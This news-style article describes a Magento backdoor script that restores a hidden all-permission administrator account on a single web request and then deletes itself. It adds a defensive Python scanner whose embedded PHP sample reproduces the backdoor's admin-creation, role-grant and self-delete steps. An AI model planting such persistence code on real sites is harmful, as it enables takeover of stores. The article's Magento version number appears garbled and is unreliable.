Who needs a better mousetrap if the old ones are fine?
This was the approach of hackers who recently compromised a server running the Magento open source e-commerce platform. To make sure they could get back in if the legitimate operators ever discovered the compromise and cleaned up, the attackers left behind a simple but effective script.
To the naked eye, the script was easily overlooked among the countless other Magento files. Examining its code, however, revealed a back door that is triggered by sending a single, harmless-looking web request to the server. It allows an attacker who might otherwise have been booted from the server to immediately regain a server administrator account with full control of the system.
The 92-line script, including comments and blank lines, is effective and easy to miss, said Krasimir Konov, a malware analyst at website security company Sucuri, who recently discovered it. One thing the script is not is new. Konov said it was a near-identical copy of code he first saw in 2012 and of samples that were later documented in 2013 and 2014.
"I would guess someone was too lazy to write their own script, so they just copied it from somewhere and used it in their attacks," Konov said Tuesday. "These scripts are just as effective, since only a few changes are required to work with newer versions of Magento."
The effectiveness of the back door lies in its ease of use. The administrator password and everything else the attacker needs is hard-coded in the script. If the hacker is ejected, all that is required is to send a GET request to the URL of the script file. The attacker then has a new administrator account with the user name, password, and email address of his or her choice.
The script contains a few more tricks for additional camouflage. Instead of being added to the existing Administrators role, the new account is placed in a freshly created role that is granted all permissions. This can hide the user from someone who only checks the familiar list of administrators in the Magento CMS. As soon as the new administrator account has been created, the script deletes itself.
The script works in the following stages (the original post illustrates each with a screenshot):
1. Define the variables for the new user (user name, password, email address).
2. Make sure Magento is installed by looking for the Mage.php file.
3. Create a new user with the previously defined variables.
4. Create a new role and give it all permissions.
5. Add the malicious user to the new role group.
6. Delete the script.
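The stages above also describe what to hunt for: a web-reachable PHP file that bootstraps Magento on its own, touches the admin user model, grants a role or all resources, and deletes itself. The following scanner is an added example for this article, not code from Sucuri or from the original post. The class and method names it matches (a `require` of `Mage.php`, `Mage::getModel('admin/user')`, `'admin/roles'`, `'admin/rules'`, `setResources`/`setResourceId` with `'all'`, `unlink(__FILE__)`) are Magento 1.x APIs as I know them and are an assumption, since the article does not list them. The sample files it scans are constructed for the example and are not real Magento files.

```python
"""Hunt for the "drop a file, GET it, get an admin" Magento backdoor pattern.

Added example, not code from the article or from Sucuri. The PHP indicators
below are Magento 1.x API names as I know them (assumption: the article does
not name them). Each indicator alone is common in legitimate code; the
combination in one self-bootstrapping file is not.
"""
import re
import tempfile
from pathlib import Path

INDICATORS = {
    # A file that loads Magento itself (instead of being loaded by Magento).
    "bootstrap": re.compile(r"require(?:_once)?\s*\(?\s*['\"][^'\"]*Mage\.php['\"]"),
    # Instantiating the admin user model.
    "admin_user": re.compile(r"getModel\(\s*['\"]admin/user['\"]\s*\)"),
    # Creating a role / role rules.
    "role": re.compile(r"getModel\(\s*['\"]admin/(?:roles|rules)['\"]\s*\)"),
    # Granting every ACL resource to that role.
    "all_resources": re.compile(
        r"setResource(?:s|Id)\s*\(\s*(?:array\s*\(\s*)?['\"]all['\"]"),
    # The self-delete at the end of the script.
    "self_delete": re.compile(r"unlink\s*\(\s*__FILE__\s*\)"),
}


def indicators_in(source: str) -> set:
    """Return the names of all indicators present in one PHP source text."""
    return {name for name, rx in INDICATORS.items() if rx.search(source)}


def is_suspicious(hits: set) -> bool:
    """Bootstrap + admin user model + (role grant or self-delete).

    Magento's own code is loaded by the framework and never needs to
    require Mage.php itself, so the bootstrap indicator is what separates
    a dropped script from a legitimate admin module.
    """
    return ("bootstrap" in hits and "admin_user" in hits
            and bool(hits & {"role", "all_resources", "self_delete"}))


def scan_tree(root: Path) -> dict:
    """Map each suspicious .php file under root to the indicators it matched."""
    findings = {}
    for path in sorted(root.rglob("*.php")):
        try:
            hits = indicators_in(path.read_text(errors="replace"))
        except OSError:
            continue  # unreadable file: skip, do not crash the sweep
        if is_suspicious(hits):
            findings[path.relative_to(root).as_posix()] = sorted(hits)
    return findings


# Constructed samples (not real Magento files): a normal front controller,
# a normal admin-side module, and a file shaped like the described backdoor.
SAMPLES = {
    "index.php": "<?php\nrequire_once 'app/Mage.php';\nMage::run();\n",
    "app/code/local/Acme/Audit/Model/Observer.php": (
        "<?php\nclass Acme_Audit_Model_Observer {\n"
        "  public function log() { $u = Mage::getModel('admin/user'); }\n}\n"
    ),
    "skin/frontend/default/img.php": (
        "<?php\n$user = 'admin2'; $pass = 'p';  // hard-coded, as in the article\n"
        "require_once '../../../app/Mage.php';\nMage::app('admin');\n"
        "$u = Mage::getModel('admin/user')->setData(array('username' => $user))->save();\n"
        "$role = Mage::getModel('admin/roles')->setRoleName('x')->setRoleType('G')->save();\n"
        "Mage::getModel('admin/rules')->setRoleId($role->getId())"
        "->setResources(array('all'))->saveRel();\n"
        "unlink(__FILE__);\n"
    ),
}


def build_sample_tree() -> Path:
    """Write the constructed samples into a temporary webroot and return it."""
    root = Path(tempfile.mkdtemp(prefix="magento-scan-"))
    for rel, body in SAMPLES.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body)
    return root


if __name__ == "__main__":
    for rel, hits in scan_tree(build_sample_tree()).items():
        print(f"SUSPICIOUS {rel}: {', '.join(hits)}")
```

Point `scan_tree` at the real webroot instead of the sample tree. Konov notes that only a few changes are needed to adapt these scripts to newer Magento versions, so treat the regexes as a starting point and extend them as variants turn up; and because the script hides the user in a role of its own, also review the role list (not just the user list) for unfamiliar roles that hold every permission.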
Konov said he was unsure how the attackers installed the script on the server he recently disinfected. Since the web server was running Magento 22.214.171.124, he suspects that one of the many known security holes in that version was exploited. He said he could not be sure because he had not done a forensic analysis.
However the back door got there, the fact that it is still being deployed years later suggests that it still works.
In a post published on Tuesday, Konov wrote: "If the back door is not properly removed from the website's environment, the file can be kept and used again and again to add new users with elevated permissions, especially if a website owner knows nothing about the infection or thinks that simply removing the new user from Magento is enough to prevent unauthorized access."